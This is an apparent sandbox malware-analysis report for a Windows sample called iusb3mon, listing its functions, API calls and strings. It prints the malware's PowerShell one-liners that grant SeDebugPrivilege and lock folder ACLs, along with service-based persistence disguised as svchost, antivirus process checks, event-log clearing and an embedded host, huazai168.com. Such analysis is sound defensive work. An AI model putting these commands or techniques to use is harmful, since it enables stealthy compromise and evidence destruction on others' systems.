Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$EventLibraryLoad
String ID:
API String ID: 2618588663-0
Opcode ID: be29f57195ea84a94ce8c2c2b77e522e43848ac1d023d4c2c1f11ca3b5df25a4
Instruction ID: 554995086426295f03db56edb549e8e9f2a4886869243a9eb7de7565d54d699d
Opcode Fuzzy Hash: be29f57195ea84a94ce8c2c2b77e522e43848ac1d023d4c2c1f11ca3b5df25a4
Instruction Fuzzy Hash: B4E08631C0010E7BDF41BBA4EC0AB9E7F35AF40304F180861F950600D1E7B55560DB65

Function 0629B4C3 Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

ExitThread.KERNEL32 ref: 0629B4F8

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ExitThread
String ID:
API String ID: 2158977761-0
Opcode ID: 67c1ede429b0f47c2fb2505168569ea8de2b371c6fe85b95bf5fe823b83e3649
Instruction ID: 8c1aefa6ac493dcb46c6cff437beecb5769f3a0dc7e2368300692ba8e95a0b30
Opcode Fuzzy Hash: 67c1ede429b0f47c2fb2505168569ea8de2b371c6fe85b95bf5fe823b83e3649
Instruction Fuzzy Hash: 89E0C232E302265BDFE237A0FC199AF3676EFC0351F040010ED50AA050DF509C51AAB2

Function 0629B4CE Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON

Download Yara Rule

APIs

ExitThread.KERNEL32 ref: 0629B4F8

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ExitThread
String ID:
API String ID: 2158977761-0
Opcode ID: 638471efc0b3ef9ba1e5d6ae1c46320ab1f6978d96b844fd01ca258a0006f2ac
Instruction ID: 40889e49a8cbe790ec7d216fd0c6c57069477d611b22709fca4e1dcd2d0539e4
Opcode Fuzzy Hash: 638471efc0b3ef9ba1e5d6ae1c46320ab1f6978d96b844fd01ca258a0006f2ac
Instruction Fuzzy Hash: A1D0A732B716225BEEF23760FC1DA7F2656DFC0352B054014EC909A040DF90DD41A9B2

Function 06291C74 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(00000000,00000080,0629682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06291C88

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c064bf59a1fa48bda74dbfcdb91a06ef78f79c06f9dfd0275faf95d62d8c9c95
Instruction ID: 328f25c5c42294a6e3ff88a3958f9f19090269426c00bc8c1ebcea04400289cb
Opcode Fuzzy Hash: c064bf59a1fa48bda74dbfcdb91a06ef78f79c06f9dfd0275faf95d62d8c9c95
Instruction Fuzzy Hash: 91C09B305583437AFF964611D94DB557E525BC0744F048554B5D5540F0C6F140E5D713

Non-executed Functions

Function 0629838B Relevance: 250.5, APIs: 71, Strings: 72, Instructions: 296libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,huazai168.com,00000000,76230F10,06296B62), ref: 062983A5
GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 062983B6
GetProcAddress.KERNEL32(?,GetModuleFileNameA), ref: 062983C3
GetProcAddress.KERNEL32(?,CreateMutexA), ref: 062983D0
GetProcAddress.KERNEL32(?,ReleaseMutex), ref: 062983DD
GetProcAddress.KERNEL32(?,GetLastError), ref: 062983EA
GetProcAddress.KERNEL32(?,CloseHandle), ref: 062983F7
GetProcAddress.KERNEL32(?,Sleep), ref: 06298404
GetProcAddress.KERNEL32(?,lstrcatA), ref: 06298411
GetProcAddress.KERNEL32(?,GetTickCount), ref: 0629841E
GetProcAddress.KERNEL32(?,WaitForSingleObject), ref: 0629842B
GetProcAddress.KERNEL32(?,GetFileAttributesA), ref: 06298438
GetProcAddress.KERNEL32(?,CreateEventA), ref: 06298445
GetProcAddress.KERNEL32(?,ResetEvent), ref: 06298452
GetProcAddress.KERNEL32(?,CancelIo), ref: 0629845F
GetProcAddress.KERNEL32(?,SetEvent), ref: 0629846C
GetProcAddress.KERNEL32(?,TerminateThread), ref: 06298479
GetProcAddress.KERNEL32(?,GetVersionExA), ref: 06298486
GetProcAddress.KERNEL32(?,GetExitCodeProcess), ref: 06298493
GetProcAddress.KERNEL32(?,ExpandEnvironmentStringsA), ref: 062984A0
GetProcAddress.KERNEL32(?,GetSystemInfo), ref: 062984AD
GetProcAddress.KERNEL32(?,GetSystemDirectoryA), ref: 062984BA
GetProcAddress.KERNEL32(?,MoveFileA), ref: 062984C7
GetProcAddress.KERNEL32(?,MoveFileExA), ref: 062984D4

Strings

GetTickCount, xrefs: 06298413
User32.dll, xrefs: 062984F0
GetSystemDirectoryA, xrefs: 062984AF
ws2_32.dll, xrefs: 062985B0
GetModuleFileNameA, xrefs: 062983B8
GetSystemInfo, xrefs: 062984A2
ExitWindowsEx, xrefs: 06298508
SetServiceStatus, xrefs: 062986A5
memcpy, xrefs: 06298580
wininet.dll, xrefs: 06298790
MoveFileExA, xrefs: 062984C9
GetVersionExA, xrefs: 0629847B
RegisterServiceCtrlHandlerA, xrefs: 062986B0
ResetEvent, xrefs: 06298447
CloseServiceHandle, xrefs: 062986F0
QueryServiceStatus, xrefs: 06298706
select, xrefs: 06298668
setsockopt, xrefs: 06298648
TerminateThread, xrefs: 0629846E
lstrcatA, xrefs: 06298406
SetEvent, xrefs: 06298461
CloseHandle, xrefs: 062983EC
CreateProcessAsUserA, xrefs: 06298780
CreateEventA, xrefs: 0629843A
WSAStartup, xrefs: 062985BD
strlen, xrefs: 06298570
ChangeServiceConfig2A, xrefs: 06298730
IsWindowVisible, xrefs: 06298528
strstr, xrefs: 062985A0
ReleaseMutex, xrefs: 062983D2
GetCurrentProcess, xrefs: 062984E3
MSVCRT.dll, xrefs: 06298558
OpenServiceA, xrefs: 062986D0
wsprintfA, xrefs: 062984FD
SetTokenInformation, xrefs: 06298770
ControlService, xrefs: 06298710
OpenProcessToken, xrefs: 06298750
GetFileAttributesA, xrefs: 0629842D
ADVAPI32.dll, xrefs: 06298698
kernel32.dll, xrefs: 062983A0
WaitForSingleObject, xrefs: 06298420
strcmp, xrefs: 06298565
gethostbyname, xrefs: 062985E8
SendMessageA, xrefs: 06298538
DuplicateTokenEx, xrefs: 06298760
GetLastError, xrefs: 062983DF
DeleteService, xrefs: 06298740
huazai168.com, xrefs: 0629839F
closesocket, xrefs: 06298638
WTSGetActiveConsoleSessionId, xrefs: 062984D6
WSAIoctl, xrefs: 06298658
MessageBoxA, xrefs: 06298518
htons, xrefs: 062985F8
send, xrefs: 06298618
CreateProcessA, xrefs: 062983AD
memset, xrefs: 06298590
GetExitCodeProcess, xrefs: 06298488
OpenSCManagerA, xrefs: 062986C0
CreateServiceA, xrefs: 06298720
socket, xrefs: 062985D8
MoveFileA, xrefs: 062984BC
ExpandEnvironmentStringsA, xrefs: 06298495
recv, xrefs: 06298628
EnumWindows, xrefs: 06298548
connect, xrefs: 06298608
getsockname, xrefs: 06298678
WSACleanup, xrefs: 062985C8
Sleep, xrefs: 062983F9
CancelIo, xrefs: 06298454
StartServiceA, xrefs: 062986E0
gethostname, xrefs: 06298688
CreateMutexA, xrefs: 062983C5

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: ADVAPI32.dll$CancelIo$ChangeServiceConfig2A$CloseHandle$CloseServiceHandle$ControlService$CreateEventA$CreateMutexA$CreateProcessA$CreateProcessAsUserA$CreateServiceA$DeleteService$DuplicateTokenEx$EnumWindows$ExitWindowsEx$ExpandEnvironmentStringsA$GetCurrentProcess$GetExitCodeProcess$GetFileAttributesA$GetLastError$GetModuleFileNameA$GetSystemDirectoryA$GetSystemInfo$GetTickCount$GetVersionExA$IsWindowVisible$MSVCRT.dll$MessageBoxA$MoveFileA$MoveFileExA$OpenProcessToken$OpenSCManagerA$OpenServiceA$QueryServiceStatus$RegisterServiceCtrlHandlerA$ReleaseMutex$ResetEvent$SendMessageA$SetEvent$SetServiceStatus$SetTokenInformation$Sleep$StartServiceA$TerminateThread$User32.dll$WSACleanup$WSAIoctl$WSAStartup$WTSGetActiveConsoleSessionId$WaitForSingleObject$closesocket$connect$gethostbyname$gethostname$getsockname$htons$huazai168.com$kernel32.dll$lstrcatA$memcpy$memset$recv$select$send$setsockopt$socket$strcmp$strlen$strstr$wininet.dll$ws2_32.dll$wsprintfA
API String ID: 2238633743-2422066229
Opcode ID: 52c4ac1947cd751e4a97a6678135676588c171dba70a6a56aca68fbed487c61c
Instruction ID: 9b56505de91de96df7995a66185eb029cb99b68459de71265e8184db5f21a033
Opcode Fuzzy Hash: 52c4ac1947cd751e4a97a6678135676588c171dba70a6a56aca68fbed487c61c
Instruction Fuzzy Hash: 29B18470560B45AEE771AF32CC85DEBBEE1EF80780B025D2DE8E645920D771A851DF41

Function 06296D6C Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 168serviceregistrystringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,huazai168.com,062BCC34,00000000), ref: 06296DA1
wsprintfA.USER32 ref: 06296E5A
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 06296E7F
CreateServiceA.ADVAPI32(00000000,?,062BCA80,000F01FF,00000110,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 06296EB8
LockServiceDatabase.ADVAPI32(00000000), ref: 06296EC5
ChangeServiceConfig2A.ADVAPI32(?,00000001,062BCA80), ref: 06296EE9
ChangeServiceConfig2A.ADVAPI32(?,00000002,00015180), ref: 06296F64
UnlockServiceDatabase.ADVAPI32(?), ref: 06296F70
GetLastError.KERNEL32 ref: 06296F7E
OpenServiceA.ADVAPI32(?,?,000F01FF), ref: 06296F99
StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 06296FAC
StartServiceA.ADVAPI32(?,00000000,00000000), ref: 06296FBA
RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 06296FFA
lstrlenA.KERNEL32(06296D4E), ref: 06297003
RegSetValueExA.ADVAPI32(?,Description,00000000,00000001,06296D4E,00000000), ref: 0629701A

Strings

Description, xrefs: 0629700F
C:\Windows\svchost.exe, xrefs: 06296E47, 06296E4D
huazai168.com, xrefs: 06296D91
SYSTEM\CurrentControlSet\Services\, xrefs: 06296FC4

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Service$Open$ChangeConfig2DatabaseStart$CreateErrorFileLastLockManagerModuleNameUnlockValuelstrlenwsprintf
String ID: C:\Windows\svchost.exe$Description$SYSTEM\CurrentControlSet\Services\$huazai168.com
API String ID: 432064258-3674977547
Opcode ID: ba81ce7b70fb478ee7c030001829bba45c9b5e85254dda56568f947278d8c7db
Instruction ID: c1eb395216104acc348396a4255e13c62113c1f5e8df82b1556f9ec8e1c318ea
Opcode Fuzzy Hash: ba81ce7b70fb478ee7c030001829bba45c9b5e85254dda56568f947278d8c7db
Instruction Fuzzy Hash: DC714B718043A8EFEB628F64DC8CBDDBBB9AB09744F0040D9E64CA6151C7B65B85DF21

Function 06295792 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103libraryloaderprocessCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 062957A6
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 062957B7
GetCurrentProcess.KERNEL32 ref: 062957FF
OpenProcessToken.ADVAPI32(00000000,000F01FF,?), ref: 0629580F
DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 06295826
LoadLibraryA.KERNEL32(Kernel32.dll,WTSGetActiveConsoleSessionId), ref: 06295836
GetProcAddress.KERNEL32(00000000), ref: 06295839
SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 0629584F
CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000430,?,00000000,00000044,?), ref: 0629587B
CloseHandle.KERNEL32(?), ref: 0629588D
CloseHandle.KERNEL32(?), ref: 06295892
FreeLibrary.KERNEL32(?), ref: 062958A0

Strings

WinSta0\Default, xrefs: 062957F8
Kernel32.dll, xrefs: 06295831
CreateEnvironmentBlock, xrefs: 062957AE
D, xrefs: 062957F1
userenv.dll, xrefs: 062957A1
WTSGetActiveConsoleSessionId, xrefs: 0629582C

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: LibraryProcessToken$AddressCloseHandleLoadProc$CreateCurrentDuplicateFreeInformationOpenUser
String ID: CreateEnvironmentBlock$D$Kernel32.dll$WTSGetActiveConsoleSessionId$WinSta0\Default$userenv.dll
API String ID: 1797627335-1926497751
Opcode ID: 9728cac5300752b64abaa2a543682b38967cc7ee88d3ef8cae3b8f4bb7c5503a
Instruction ID: 224c7184fbecee960179761ef712e366a494bc0ca612014bb53e95e92bc80ff0
Opcode Fuzzy Hash: 9728cac5300752b64abaa2a543682b38967cc7ee88d3ef8cae3b8f4bb7c5503a
Instruction Fuzzy Hash: C231EEB1D2122AABDF11AFE5DC89EDEBFB9EF48750F110016FA05B2150C6B05A41DFA0

Function 0629628E Relevance: 22.8, APIs: 5, Strings: 8, Instructions: 46processsleepshutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 06291F38: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,?,062962A3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 06291F56

Part of subcall function 06295CE6: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 06295CF6
Part of subcall function 06295CE6: Process32First.KERNEL32(00000000,?), ref: 06295D0F
Part of subcall function 06295CE6: Process32Next.KERNEL32(00000000,00000128), ref: 06295D2A
Part of subcall function 06295CE6: CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 06295D4F

WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'),00000000), ref: 062962D7
WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P,00000000), ref: 062962DF
WinExec.KERNEL32(powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA,00000000), ref: 062962E7
Sleep.KERNEL32(00001388), ref: 06296301
ExitWindowsEx.USER32(00000000,00000000), ref: 06296309

Strings

360tray.exe, xrefs: 062962AA
360Tray.exe, xrefs: 062962BB
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 06296294
powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P, xrefs: 062962DA
powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'), xrefs: 062962D2
powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA, xrefs: 062962E2
Microsoft, xrefs: 0629628F
C:\Windows\System32\SrpUxNativeSnapIn.dll, xrefs: 062962EB

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Exec$Process32$CloseCreateExitFirstHandleNextOpenSleepSnapshotToolhelp32Windows
String ID: 360Tray.exe$360tray.exe$C:\Windows\System32\SrpUxNativeSnapIn.dll$Microsoft$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"')$powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA
API String ID: 3961968786-728021376
Opcode ID: afbedb621ad4ee6aaf1c6310be6f8c25669440d6a5f9584536aef17d2e8b3246
Instruction ID: efea7350aa8256d359b8f9092de2114821d19d502c167930b3537f8752671c64
Opcode Fuzzy Hash: afbedb621ad4ee6aaf1c6310be6f8c25669440d6a5f9584536aef17d2e8b3246
Instruction Fuzzy Hash: 14F09022B7035236AEE033B63C8DDDB2E68DFC6FA1310252AFD14A44C0D980C0418972

Function 06293C8E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60processCOMMON

Download Yara Rule

APIs

Part of subcall function 06298FF7: LoadLibraryA.KERNEL32(ADVAPI32.dll,00000000,SeShutdownPrivilege,?,?,062939FA,SeShutdownPrivilege,00000001,?,0629200F,?), ref: 0629900F
Part of subcall function 06298FF7: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0629901F
Part of subcall function 06298FF7: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0629902A
Part of subcall function 06298FF7: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 06299035
Part of subcall function 06298FF7: LoadLibraryA.KERNEL32(kernel32.dll,?,062939FA,SeShutdownPrivilege,00000001,?,0629200F,?), ref: 0629903F
Part of subcall function 06298FF7: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 0629904A
Part of subcall function 06298FF7: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06299092
Part of subcall function 06298FF7: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0629909A
Part of subcall function 06298FF7: CloseHandle.KERNEL32(?), ref: 062990A9
Part of subcall function 06298FF7: FreeLibrary.KERNEL32(00000000), ref: 062990BA
Part of subcall function 06298FF7: FreeLibrary.KERNEL32(00000000), ref: 062990C5

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06293CAC
Process32First.KERNEL32(?,00000128), ref: 06293CD5
OpenProcess.KERNEL32(00000001,00000000,?,?,00000128,00000002,00000000), ref: 06293CFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 06293D07
Process32Next.KERNEL32(?,00000128), ref: 06293D17
CloseHandle.KERNEL32(?,?,00000128,?,00000128,00000002,00000000), ref: 06293D23

Strings

SeDebugPrivilege, xrefs: 06293C99, 06293D2B
explorer.exe, xrefs: 06293CE0

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$Load$CloseFreeHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID: SeDebugPrivilege$explorer.exe
API String ID: 1212985741-2721386251
Opcode ID: 9d31e089726d938733909c68ca13d261dd4f6a9e1c65fa281fdcb7826030b622
Instruction ID: d33d8402cb6c7d299b04910c522767fd6498e5f4c9b07b1c80930ca050725240
Opcode Fuzzy Hash: 9d31e089726d938733909c68ca13d261dd4f6a9e1c65fa281fdcb7826030b622
Instruction Fuzzy Hash: 3911A532914316BBEF94AAA0ED06FDE7BADDF45710F100066FF40E50D0DBB19A519AA4

Function 06292E2C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06292E31
FindFirstFileA.KERNEL32(?,?), ref: 06292EBF
DeleteFileA.KERNEL32(?,?,?,00000001), ref: 06292F67
FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06292F7F
FindClose.KERNEL32(00000000,?,?,00000001), ref: 06292F8E
RemoveDirectoryA.KERNEL32(?,?,?,00000001), ref: 06292F97

Part of subcall function 062A4539: __EH_prolog.LIBCMT ref: 062A453E

Part of subcall function 062931FE: __EH_prolog.LIBCMT ref: 06293203

Strings

*.*, xrefs: 06292E97

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: FileFindH_prolog$CloseDeleteDirectoryFirstNextRemove
String ID: *.*
API String ID: 360591376-438819550
Opcode ID: e32d2f4bfb35364b1a3bce190d771895f5b43edec7eb3b9b5db5181aa65ecbc2
Instruction ID: 73a736dbd6b44ac60e4609031b42ee28a1d4d203aafbcf4ed72865f3f2f5857e
Opcode Fuzzy Hash: e32d2f4bfb35364b1a3bce190d771895f5b43edec7eb3b9b5db5181aa65ecbc2
Instruction Fuzzy Hash: 08419171D21209ABCF94EBA4DC88EEEB7B8EF88310F004059ED65E7190DB749B45CB60

Function 06293B39 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMON

Download Yara Rule

APIs

OpenEventLogA.ADVAPI32(00000000,062B7C38), ref: 06293B93
ClearEventLogA.ADVAPI32(00000000,00000000), ref: 06293BA2
CloseEventLog.ADVAPI32(00000000), ref: 06293BA9

Strings

System, xrefs: 06293B52
Application, xrefs: 06293B44
Security, xrefs: 06293B4B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
